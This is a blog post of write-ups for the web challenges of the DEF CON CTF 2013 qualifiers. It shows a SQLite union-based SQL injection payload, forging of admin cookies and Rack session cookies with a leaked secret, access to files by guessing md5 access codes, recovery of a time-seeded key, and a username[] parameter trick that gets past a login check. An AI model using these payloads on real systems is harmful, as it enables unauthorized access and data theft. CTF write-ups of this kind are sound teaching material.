... back to the original entry ...
... leave a comment feel free to write English comment in the Polish-comment section ...

DEF CON CTF 2013 Quals - web writeups

I haven't played in a lot of CTF games. I just used to register at random nickname, take a look at kinda interesting web-challenges and tried to solve them in a short period of time. It was like CTF blitz. However, I decided to give playing CTFs a try. I've joined new team and challenged DEF CON CTF (ofc, only in a web category). Here's my short (published just after competitions' end) writeups for web-challenges (called also 3dub).


babysfirst
It's just an easy SQL Injection (on SQLite database). We could use sqlite_master to get table and column names:
username=' or 1=1 union select sql from sqlite_master WHERE type='table'--
logged in as CREATE TABLE keys (value string)

And here's the way to get the flag:

username=' or 1=1 union select value from keys--
The key is: literally online lolling on line WucGesJi
badmedicine
We are able to log as everyone, except admin. Every signing in attempt creates new cookie (which is dependent on choosen login). One nickname's letter sets two cookie's characters. We shoudn't even try to guess the way, used to creating these cookies. Much faster idea is to log in as adminX, which gives us new cookie: username=09c8259ca076. All we have to do is just removing last two characters from it (which suits to the letter X).
Using username=09c8259ca0 cookie gives us the flag:
The key is: who wants oatmeal raisin anyways twumpAdby
hypeman
While trying to get admin's secret (/secrets/0) the error page is displayed. Let's take a look at it:
rack.session.options 	
{
  :path=>"/", 
  :domain=>nil, 
  :expire_after=>nil, 
  :secure=>false, 
  :httponly=>true, 
  :defer=>false, 
  :renew=>false, 
  :sidbits=>128, 
  :secure_random=>SecureRandom, 
  :secret=>"wroashsoxDiculReejLykUssyifabEdGhovHabno", 
  :coder=>#<Rack::Session::Cookie::Base64::Marshal:0x000000034e2228>
}
rack.session.unpacked_cookie_data 	
{
  "session_id"=>"6ef1fd11f31860a44f2846c776492c72a3c6ab7233e27ec2c64f8d8ccb9420b4", 
  "tracking"=>
  {
    "HTTP_USER_AGENT"=>"50767cb0bf2f1f10587db0e2eb5a1e32d0c887fd",
    "HTTP_ACCEPT_ENCODING"=>"a0bfc876d68fe7aea700da5ea8925abac6f2f794",
    "HTTP_ACCEPT_LANGUAGE"=>"e88e52a62f706f3c0ae7d4caaf8925434a837c9f"},
    "csrf"=>"b688a1219c420e329efb59dfc33c111845d04641cfd140a32935e684ec722ab8", 
    "user_name"=>"xxxxxxxxx"
  }
}
We just need to set up own Sinatra server, create new admin cookie and sign it (we know the value of :secret).
enable :sessions
set :session_secret, "wroashsoxDiculReejLykUssyifabEdGhovHabno"
session[:user_name] = 'admin'
session[:csrf] = "b688a1219c420e329efb59dfc33c111845d04641cfd140a32935e684ec722ab8"
Little cookie tampering and the flag is ours!:
watch out for this Etdeksogav
rememberme
It's easy to spot, that md5('usernames.txt') = 60635c6862d44e8ac17dc5e144c66539.
Now, we could super-easily get access to other files. As passwords.txt looks like honeypot, we should forget about it and check genfile.php.
getfile.php?filename=getfile.php&accesscode=md5('getfile.php')
getfile.php?filename=getfile.php&accesscode=0701593e23e676eaba834916a6ac7272

The source gives us the information, that filekey.txt exists

getfile.php?filename=key.txt&accesscode=65c2a527098e1f7747eec58e1925b453

Next lines of code reveal how to gain the key hidden in key.txt

$value = time();
/* --- cut --- */
srand($value);
/* --- cut --- */
$key = rand();
$cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
That's all we need. We got ciphered text, which we have to decipher (it is what key.txt displays) and we also know the key.
The value of the key - due to srand() - could be easily recreated. The constant seed makes rand() to return the same result, everytime it's called. Morover, our seed is time(). The value of time() is known ('cos we are able to check when the request to display key.txt content had been sent. However, if we coudn't get the exact value of it, we could easily brute-force small key-space nearby time() value).
The next step is just mcrypt_decrypt() which reveals the flag:
To boldly go where no one has gone before WMx8reNS
worsemedicine
The fastest points ever. We are able to login as everyone except admin. Instead of sending requestes like that:
_utf8=%26%23x2713%3B&verification=7734c700&username=admin&password=

we should "cheat" the challenge with this one:

_utf8=%26%23x2713%3B&verification=7734c700&username[]=admin&password=

Voila!

The key is: computers downtown and computers up in harlem

Yeah, web category is cleared!